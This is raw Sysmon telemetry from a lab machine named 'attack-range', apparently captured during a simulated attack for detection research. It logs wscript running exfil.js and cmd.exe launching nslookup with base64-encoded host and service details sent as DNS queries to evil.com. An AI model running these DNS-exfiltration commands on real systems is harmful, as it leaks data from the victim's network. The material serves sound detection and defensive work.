14:16:47.463{2E1864BB-17CF-629A-3F42-000000005F02}80085200C:\Windows\system32\cmd.exe{2E1864BB-17CF-629A-4142-000000005F02}7580C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.473{2E1864BB-17CF-629A-4142-000000005F02}7580C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CF-629A-3F42-000000005F02}8008C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlldmf.tmp 2>&1 354300x8000000000000000204844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{00000000-0000-0000-0000-000000000000}216<unknown process>-udptruefalse127.0.0.1-53109-false127.0.0.1-53domain 10341000x8000000000000000204843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.442{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-4042-000000005F02}896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.442{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-4042-000000005F02}896C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.426{2E1864BB-17CF-629A-4042-000000005F02}8961772C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-3F42-000000005F02}8008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.426{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-4042-000000005F02}896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.411{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.411{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.411{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.411{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.411{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3F42-000000005F02}8008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.411{2E1864BB-17A1-629A-783D-000000005F02}55527560C:\Windows\System32\WScript.exe{2E1864BB-17CF-629A-3F42-000000005F02}8008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.423{2E1864BB-17CF-629A-3F42-000000005F02}8008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlldmf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.411{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcnpgex.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.395{2E1864BB-17CF-629A-3D42-000000005F02}56287920C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-3E42-000000005F02}5364C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.395{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.395{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.395{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.395{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.379{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3E42-000000005F02}5364C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.379{2E1864BB-17CF-629A-3C42-000000005F02}10966372C:\Windows\system32\cmd.exe{2E1864BB-17CF-629A-3E42-000000005F02}5364C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.393{2E1864BB-17CF-629A-3E42-000000005F02}5364C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CF-629A-3C42-000000005F02}1096C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcnpgex.tmp 2>&1 10341000x8000000000000000204823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.364{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-3D42-000000005F02}5628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.364{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-3D42-000000005F02}5628C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.364{2E1864BB-17CF-629A-3D42-000000005F02}56287920C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-3C42-000000005F02}1096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.341{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3D42-000000005F02}5628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.341{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.341{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.341{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.341{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.341{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3C42-000000005F02}1096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 